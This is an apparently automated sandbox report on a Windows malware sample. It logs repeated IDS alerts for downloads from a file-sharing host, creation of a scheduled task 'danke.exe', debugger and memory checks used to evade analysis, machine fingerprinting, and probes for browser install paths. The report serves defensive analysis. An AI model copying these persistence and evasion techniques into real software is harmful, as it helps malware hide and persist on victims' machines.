TCP 192.168.56.101:49197 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49285 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49467 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49378 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49478 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49330 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49263 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49328 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49267 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49516 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49368 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49291 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49379 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49276 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49493 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49211 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49313 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49264 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49496 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49398 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49315 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49283 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49293 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49400 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49509 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49284 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49317 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49265 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49322 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49208 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49495 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49504 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49311 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49296 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49334 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49332 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49347 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49297 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49358 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49468 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49266 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49387 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49497 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49220 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49434 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49394 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49510 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49382 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49404 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49418 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49320 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49286 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49316 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49237 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49416 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49342 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49498 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49310 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49210 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49502 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49321 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49439 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49374 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49251 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49337 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49223 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49408 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49431 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49489 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49365 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49524 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49362 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49523 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49482 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49453 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49512 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49469 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49306 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49435 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49249 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49525 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49233 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49269 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49357 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (25 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2023, 7:35 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (15 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 24, 2023, 7:27 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:27 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:34 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:34 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:27 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:27 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:27 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:27 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:34 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:34 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:34 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:34 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:35 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:35 a.m.			0	0
IsDebuggerPresent July 24, 2023, 7:35 a.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 24, 2023, 7:34 a.m.	buffer: SUCCESS: The scheduled task "danke.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW July 24, 2023, 7:34 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW July 24, 2023, 7:34 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 24, 2023, 7:34 a.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (36 events)

Time & API	Arguments	Status	Return
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eae08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eae08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eae08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eae08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eae88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eae88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ead88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ead88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ead88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ead88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ead88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eae08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eae08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb8c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb8c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dbf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: f Ô?ø¢p'Y÷¢éÃ9\ÁZCÍà?¦ÜÀ% N[ crypto_handle: 0x0041dbf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046d970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046e230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046e230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2023, 7:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046e0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 24, 2023, 7:27 a.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

